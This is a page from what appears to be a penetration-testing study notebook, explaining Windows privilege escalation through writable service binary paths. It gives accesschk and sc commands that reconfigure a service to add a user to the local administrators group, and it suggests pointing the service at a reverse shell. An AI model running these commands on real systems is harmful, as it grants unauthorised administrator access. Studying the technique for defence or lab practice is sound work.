coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page

Was this helpful?

  1. Windows PrivEsc

Binary Paths

PowerUp shows this under service permissions

WinPEAS shows this under services information

Run: accesschk64.exe -uwcv Everyone * (Check where we have write access to Everyone group and the service name) To know more info about the service: accesschk64.exe -uwcv daclsvc If we have CHANGE_CONFIG, run: sc qc daclsvc sc config daclsvc binpath= “net localgroup administrators user /add” Run sc qc daclsvc to check if BINARY_PATH_NAME has been set Run net localgroups administrators You will only see the preexisiting users. Then run sc start daclsvc (You may get an error. Still run the next command to check) net localgroup administrators

You can even try adding a path of reverse shell to the binpath to spawn a admin shell

PreviousUnquoted Service PathNextDLL Hijacking

Last updated 4 years ago

Was this helpful?